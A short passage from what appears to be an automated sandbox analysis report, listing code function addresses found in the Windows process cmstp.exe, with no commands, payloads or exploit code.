          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E0D204_2_045E0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B25DD4_2_046B25DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E04_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046125814_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04606E304_2_04606E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AD6164_2_046AD616
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2EF74_2_046B2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1FF14_2_046B1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046BDFCE4_2_046BDFCE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046BE824